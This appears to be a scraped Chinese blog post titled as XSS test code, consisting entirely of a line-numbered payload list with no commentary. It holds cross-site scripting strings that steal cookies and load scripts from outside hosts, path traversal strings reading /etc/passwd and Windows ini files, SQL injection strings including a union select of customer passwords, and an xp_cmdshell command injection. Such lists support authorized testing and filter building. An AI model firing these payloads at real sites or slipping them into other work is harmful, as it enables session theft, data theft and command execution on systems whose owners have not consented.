1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
|
'><script>alert(document.cookie)</script>
='
><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert(
'XSS'
)%3C/script%3E
<script>alert(
'XSS'
)</script>
<img src=
"javascript:alert('XSS')"
>
%0a%0a<script>alert(\
"Vulnerable\")</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<script>alert('Vulnerable');</script>
<script>alert('Vulnerable')</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert('Vulnerable')</script>
a/
a?<script>alert('Vulnerable')</script>
"
><script>alert(
'Vulnerable'
)</script>
';exec%20master..xp_cmdshell%20'
dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt
'--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'
';!--"<XSS>=&{()}
<IMG src="javascript:alert('
XSS
');">
<IMG src=javascript:alert('
XSS
')>
<IMG src=JaVaScRiPt:alert('
XSS
')>
<IMG src=JaVaScRiPt:alert("XSS")>
<IMG src=javascript:alert('
XSS
')>
<IMG src=javascript:alert('
XSS
')>
<IMG src=javascript:alert('XSS')>
<IMG src="jav ascript:alert('
XSS
');">
<IMG src="jav ascript:alert('
XSS
');">
<IMG src="jav ascript:alert('
XSS
');">
"<IMG src=java\0script:alert(\"XSS\")>";'
> out
<IMG src=
" javascript:alert('XSS');"
>
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND=
"javascript:alert('XSS')"
>
<BODY ONLOAD=alert(
'XSS'
)>
<IMG DYNSRC=
"javascript:alert('XSS')"
>
<IMG LOWSRC=
"javascript:alert('XSS')"
>
<BGSOUND src=
"javascript:alert('XSS');"
>
<br size=
"&{alert('XSS')}"
>
<LAYER src=
"http://xss.ha.ckers.org/a.js"
></layer>
<LINK REL=
"stylesheet"
href=
"javascript:alert('XSS');"
>
<IMG src=
'vbscript:msgbox("XSS")'
>
<IMG src=
"mocha:[code]"
>
<IMG src=
"livescript:[code]"
>
<META HTTP-EQUIV=
"refresh"
CONTENT=
"0;url=javascript:alert('XSS');"
>
<IFRAME src=javascript:alert(
'XSS'
)></IFRAME>
<FRAMESET><FRAME src=javascript:alert(
'XSS'
)></FRAME></FRAMESET>
<TABLE BACKGROUND=
"javascript:alert('XSS')"
>
<DIV STYLE=
"background-image: url(javascript:alert('XSS'))"
>
<DIV STYLE=
"behaviour: url('http://www.how-to-hack.org/exploit.html');"
>
<DIV STYLE=
"width: expression(alert('XSS'));"
>
<STYLE>@im\port
'\ja\vasc\ript:alert("XSS")'
;</STYLE>
<IMG STYLE=
'xss:expre\ssion(alert("XSS"))'
>
<STYLE TYPE=
"text/javascript"
>alert(
'XSS'
);</STYLE>
<STYLE TYPE=
"text/css"
>.XSS{background-image:url(
"javascript:alert('XSS')"
);}</STYLE><A
class
=
"XSS"
></A>
<STYLE type=
"text/css"
>BODY{background:url(
"javascript:alert('XSS')"
)}</STYLE>
<BASE href=
"javascript:alert('XSS');//"
>
getURL(
"javascript:alert('XSS')"
)
a=
"get"
;b=
"URL"
;c=
"javascript:"
;d=
"alert('XSS');"
;eval(a+b+c+d);
<XML src=
"javascript:alert('XSS');"
>
"> <BODY ONLOAD="
a();
"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
<SCRIPT src=
"http://xss.ha.ckers.org/xss.jpg"
></SCRIPT>
<IMG src=
"javascript:alert('XSS')"
<!--
#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->
<IMG src=
"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"
>
<SCRIPT a=
">"
src=
"http://xss.ha.ckers.org/a.js"
></SCRIPT>
<SCRIPT =
">"
src=
"http://xss.ha.ckers.org/a.js"
></SCRIPT>
<SCRIPT a=
">"
''
src=
"http://xss.ha.ckers.org/a.js"
></SCRIPT>
<SCRIPT
"a='>'"
src=
"http://xss.ha.ckers.org/a.js"
></SCRIPT>
<SCRIPT>document.write(
"<SCRI"
);</SCRIPT>PT src=
"http://xss.ha.ckers.org/a.js"
></SCRIPT>
<A href=http:
//www.gohttp://www.google.com/ogle.com/>link</A>
admin
'--
'
or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
"
or 0=0
#
or 0=0
#
' or
'x'
=
'x
" or "x"="x
'
) or (
'x'
=
'x
'
or 1=1--
" or 1=1--
or 1=1--
' or a=a--
"
or
"a"
=
"a
') or ('a'='a
"
) or (
"a"
=
"a
hi"
or
"a"
=
"a
hi"
or 1=1 --
hi' or 1=1 --
hi
' or '
a
'='
a
hi
') or ('
a
'='
a
hi
") or ("
a
"="
a[/code]
|
XSS跨站测试代码
最新推荐文章于 2024-05-03 18:41:56 发布